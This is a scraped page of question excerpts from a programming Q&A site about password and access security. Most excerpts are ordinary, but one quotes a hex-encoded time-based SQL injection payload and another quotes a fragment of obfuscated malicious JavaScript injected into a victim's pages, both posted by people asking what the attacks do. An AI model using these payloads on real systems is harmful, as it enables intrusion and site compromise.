Search Results

Search found 21719 results on 869 pages for 'password security'.

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

Page 228/869 | < Previous Page | 224 225 226 227 228 229 230 231 232 233 234 235  | Next Page >

  • What is this hacker trying to do?

    - by JW
    If you do a search for: http://www.google.co.uk/search?q=0x57414954464F522044454C4159202730303A30303A313527&hl=en&start=30&sa=N you will see a lot of examples of an attempted hack along the lines of: 1) declare @q varchar(8000) select @q = 0x57414954464F522044454C4159202730303A30303A313527 exec(@q) -- What is exactly is it trying to do? Which db is it trying to work on? Do you know of any advisories about this?

    Read the article

  • WINSDK: Determining whether an arbitrary pid identifies a running process on Windows

    - by Vlad Romascanu
    Attempting to implement a poor man's test of whether a process is still running or not (essentially an equivalent of the trivial kill(pid, 0).) Hoped to be able to simply call OpenProcess with some minimal desired access then test for either GetLastError() == ERROR_INVALID_PARAMETER or GetExitCodeProcess(...) != STILL_ACTIVE. Nice try... Running on Windows XP, as administrator: HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid); if (!hProc) { DWORD dwLastError = GetLastError(); } ...fails miserably with dwLastError == ERROR_ACCESS_DENIED when pid is owned by a different (not SYSTEM) user. Moreover, if pid was originally owned by a different user but has since terminated, OpenProcess also fails with ERROR_ACCESS_DENIED (not ERROR_INVALID_PARAMETER.) Do I have to use Process32First/Process32Next or EnumProcesses? I absolutely do not want to use SeDebugPrivilege. Thanks, V

    Read the article

  • SQL Server db_owner

    - by andrew007
    Hi, in my SQL2008 I have a user which is in the "db_datareader", "db_datawriter" and "db_ddladmin" DB roles, however when he tries to modify a table with SSMS he receives a message saying: You are not logged in as the database owner or system administrator. You might not be able to save changes to tables that you do not own. Of course, I would like to avoid such message, but until now I did find the way... Therefore, I try to modify the user by adding him to the "db_owner" role, and of course I do not have the message above. My question is: Is it possible to keep the user in the "db_owner" role, but deny some actions like alter user or ? I try "alter any user" securable on DB level, but it does not work... THANKS!

    Read the article

  • Chunks of javascript added to webpages on server

    - by SteD
    I've found out that my web pages (mainly index.php, main.html, include.inc) have been injected with a chunk of javascript codes at the very bottom after my original code. <script>try {this.l="";var d=window[unescape("%75%6e%65%73%63%61%70%65")];var M;if(M!='' && M!='a'){M='bt'};var A="";var Mc=new String();var e=null;this.k="";var t;if(t!='' && t!='iX'){t=''};var K=window[d("%52%65%67%45%78%70")];var p=d("%72%65%70%6c%61%63%65");function C(H,Z){var N=d("%5b" Is it possible for SQL injections to add the chunk of js code to the webpages(like 50 of them are infected)? Or is it a virus on the server itself? I am using Drupal + Ubercart with quite minimal forms inputs.

    Read the article

  • Read/Write versus Create/Read/Update/Delete permissions difference

    - by archmeta
    From a practical standpoint, is there any real-world difference between Read/Write permissions and Create/Read/Update/Delete permissions? It would seem that if a user had the ability to 'create', he should always have the ability to 'update' or 'delete'? If this is correct, then read/write should always be sufficient, and there is no need to store separate Create/Read/Update/Delete permissions? Are there any real-world use cases in which a user should be given permissions to create but not update, or update but not delete, etc...?

    Read the article

  • Safari - showing expired .NET Page

    - by Hidayath
    We have a strange problem in Safari. When the user logs out of our Web Application we expire the forms authentication with the following FormsAuthentication.SignOut(); Session.Abandon(); This works fine in IE and Firefox (when the user hits the back button they are presented with a page expired message and are forced to login) but in Safari the last page the user was working on shows up. I tried many of the suggested thinks like setting the Response.Expires but nothing helps , Has anyone faced this problem ? Do u have any suggestion / workarounds ? Thanks

    Read the article

  • Is this safe on a production server?

    - by Camran
    I have a database application (or search engine) which is called Solr. I connect to it via port 8983. I do this from php code, so I add and remove records from it via php. On my server I have a firewall. I have set this firewall to only allow connections to and from this port (8983) from the ip adress of my own server. In other words, only allow servers IP to access this port. Is that safe? Or am I thinking all wrong here? Will others be able to "simulate" my ip adress and act as the server? This is because otherwise others may add/remove records as they want from their own ip adresses... Thanks

    Read the article

  • Backdoor Strategy- opinion needed.

    - by the Hampster
    I'm creating an application to track publications and grants for a university. Professors will need to put they CV into the system when it is up and running. Yeah, right. The person in charge is planning on hiring someone to input all of the information, but my questions is how? The strategy I'm thinking of is to install a backdoor. The lucky undergrad can log in as any professor using the backdoor. Once all the data is removed, the backdoor can be removed. Doing so would probably be as simple as editing out a comment in the config file. The IT guys would still have access, but since they control the machines, they would have access anyway. Are there any flaws to this strategy?

    Read the article

  • user access management in j2ee web application

    - by kawtousse
    Hi everyone, I am working with jsp/servlet project and i have to complete the module of access management to my jsps since I have more than one user with different profile. I defined a table in my database wich resume the profil and the url permitted like that: id_profil :1 url : http://localhost/...xyz.jsp id page 1 Now I am trying to let the menu modified appropriately to the id_profil of the logged user. So there are pages allowed in one profile but must be hidden to others. I have no idea since now how to realize this and it is so important for me. thanks for your help.

    Read the article

  • Getting 403 error when using CSRF filter with tomcat 6.0.32

    - by sps
    This is my filer config in web.xml <filter> <filter-name>CSRFPreventionFilter</filter-name> <filter-class>org.apache.catalina.filters.CsrfPreventionFilter</filter-class> <init-param> <param-name>entryPoints</param-name> <param-value>/login<param-value> </init-param> </filter> <filter-mapping> <filter-name>CSRFPreventionFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <filter> Am I missing something? Are any code-changes necessary to enable csrf protection in tomcat

    Read the article

  • Persisting sensitve data in asp.net, odd implementation

    - by rawsonstreet
    For reasons not in scope of this question I have implemented a .net project in an iframe which runs from a classic asp page. The classic asp site persisted a few sensitive values by hitting the db on each page. I have passed there variables as xml to the aspx page, now I need to make these values available on any page of this .net site. I've looked into the cache object but we are on a web farm so I am not sure it would work. Is there a way I can can instantiate an object in a base page class and have other pages inherit from the base page to access these values? What is the best way to persist these values? A few more points to consider the site runs in https mode and I cannot use session variables, and I would like to avoid cookies if possible..

    Read the article

  • Detecting use after free() on windows. (dangling pointers)

    - by The Rook
    I'm trying to detect "Use after free()" bugs, otherwise known as "Dangling pointers". I know Valgrind can be used to detect "Use after free" bugs on the *nix platform, but what about windows? What if I don't have the source? Is there a better program than Valgrind for detecting all dangling pointers in a program? A free and open source would be preferred , but I'll use a commercial solution if it will get the job done.

    Read the article

  • MVC Serve audio files while preventing direct linking using HttpResponseBase

    - by VinceGeek
    I need to be able to serve audio files to an mvc app while preventing direct access. Ideally the page would render with a player control so the user can start/stop the audio linked to the database record (audio files are in a folder not the db). I have a controller action like this: Response.Clear(); Response.ContentType = "audio/wav"; Response.TransmitFile(audioFilename); Response.End(); return Response; and the view uses the RenderAction method <% Html.RenderAction("ServeAudioFile"); %> this works but it won't display inline on the existing view, it opens a new page with just the media control. Am I totally barking up the wrong tree or is there a way to embed the response in the existing view? works exactly as I would like but I can't control access to the file.

    Read the article

  • How to sign XML document or verify XML document signature with C++?

    - by Budda
    Subj. I need to sign/verify in native C++ (no .NET), using private key for signing, public key for verification. I saw few examples on MSDN (http://msdn.microsoft.com/en-us/library/ms761363(VS.85).aspx) that demonstrate how to sign the document with CSP (I don't know what this means). For my case I need to create a "key" from the binary data array... can somebody help me with that? Thank you in advance.

    Read the article

  • Authenticate User manually

    - by Sergey
    I am trying to authenticate the user after I got credentials using oAuth (with Twitter if that makes a difference). As far as I could understand it, I can directly put the Authentication object into SecurityContextHolder. Here is how I do it: Authentication auth = new TwitterOAuthAuthentication(member, userDetailsService.loadUserByUsername(member.getUsername()).getAuthorities()); SecurityContextHolder.getContext().setAuthentication(auth); This for some reason does absolutely nothing. What am I missing and what should I do to accomplish what need?

    Read the article

  • How to play music on site preventing direct file download

    - by Hugo Palma
    I'm starting a blog with a hosted wordpress instance and i would like to be able to stream music using a flash player on some posts. The problem is that every player i find uses a simple param to get the file url which makes it very easy for someone to find that url and just download the file. A server side solution can be implemented as i have full access to the server.

    Read the article

  • PAC with kerberoes

    - by Varun
    I am currently working on kerberoes, and for now have this doubt on PAC in MS-KILE kerberoes extension. Can pac included in pactype strcuture withtin authorization data, is meant for client to decrypt and decode. It seems (if my understanding is correct), that PAC is encrypted with target server's encryption key, which is known only to kdc and target server, and therefore, client just needs to forward that to server when requesting a service, and isn't suppose to decrypt and extract details about its credentails. Is there a way to try to decrypt this on the fly? ( is there sufficient information available in AS-REP for me extract and decrypt this?

    Read the article

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

< Previous Page | 224 225 226 227 228 229 230 231 232 233 234 235  | Next Page >